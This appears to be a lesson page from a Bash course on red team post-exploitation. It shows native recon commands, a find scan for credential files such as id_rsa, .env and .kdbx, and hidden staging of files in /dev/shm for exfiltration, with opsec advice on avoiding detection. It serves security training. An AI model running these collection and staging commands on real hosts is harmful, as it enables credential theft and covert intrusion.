Bash › Red Team Bash
Bash for red team operations
On a compromised Linux host (in an authorised engagement), Bash is already there — no uploads, no dependencies. That makes it the natural language for situational awareness, data collection, and staging. This lesson covers operational Bash, including the opsec awareness that real operations demand.
You'll learn to
- Gather situational awareness fast
- Collect and stage data with native tools
- Apply basic operational security awareness
Situational awareness in one pass
# Native, dependency-free recon of a foothold:
id; hostname; uname -a # who and where
ip a 2>/dev/null || ifconfig # network interfaces
ss -tlnp 2>/dev/null || netstat -tlnp # listening services
ps aux --sort=-%cpu | head # running processes
cat /etc/passwd | grep -v nologin # interactive users
sudo -n -l 2>/dev/null # sudo rights
The first thing on any foothold is orientation — who you are, what the box is, what’s running, what you can reach. All native tools, no uploads, which matters when you want to stay quiet and avoid touching disk.
Collection and staging
# Find and stage interesting files (read-only, into one archive):
find / \( -name "*.env" -o -name "id_rsa" -o -name "*.kdbx" \) 2>/dev/null
# Stage to memory (tmpfs) rather than disk where possible:
mkdir -p /dev/shm/.cache && cp target_file /dev/shm/.cache/
# Bundle for exfil:
tar czf /dev/shm/.cache/loot.tgz -C /dev/shm/.cache . 2>/dev/null
Collection is find-plus-copy, but where you stage matters: /dev/shm is memory-backed (tmpfs), so staging there avoids writing to disk. The principle is to minimise the footprint you leave.
Checkpoint
Why do red teamers favour Bash and native commands for post-exploitation, and what is the tradeoff?
Bash and built-in commands are present on every Linux host, so there's nothing to upload — no binaries that could be flagged or fail dependency checks. This 'living off the land' approach blends in and avoids touching disk unnecessarily. The tradeoff is that these native commands are exactly what defenders monitor: an enumeration burst or a mass find scan generates telemetry. So operators balance thoroughness against noise, preferring targeted, paced commands when staying undetected matters.
Try it yourself
Write a short situational-awareness script that gathers identity, network interfaces, listening services, and sudo rights — all with native commands. Run it on a system you control. Then reflect on which of those commands a defender would most likely alert on, and how you’d reduce the noise.
Key takeaways
- Bash is native to every Linux host — ideal for living-off-the-land.
- Orient first: identity, network, services, processes, sudo rights.
- Stage to memory (/dev/shm) to minimise disk footprint.
- Every command is also a detection point — quiet often beats thorough.
Quick quiz
Next, advanced Bash — the pipes, process substitution, and job control that make complex one-liners possible.